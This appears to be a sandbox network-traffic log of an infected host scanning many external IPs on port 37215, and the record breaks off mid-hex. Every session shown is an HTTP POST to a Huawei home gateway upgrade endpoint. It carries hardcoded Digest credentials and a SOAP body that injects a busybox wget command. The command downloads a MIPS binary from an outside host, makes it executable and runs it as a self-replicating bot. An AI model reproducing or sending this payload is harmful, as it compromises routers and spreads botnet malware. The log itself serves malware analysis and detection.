                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  886192.168.2.1343448197.186.153.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.440243006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  887192.168.2.1358402197.7.89.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.440279961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  888192.168.2.1341696102.224.119.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.441066980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  889192.168.2.1340118157.146.151.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.441144943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  890192.168.2.134018841.1.210.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.441171885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  891192.168.2.134722877.192.32.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.441205025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  892192.168.2.1339600197.53.172.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.441216946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  893192.168.2.1346262157.171.69.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.441273928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  894192.168.2.1350190157.254.137.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.441612005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  895192.168.2.134926041.99.105.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.442504883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 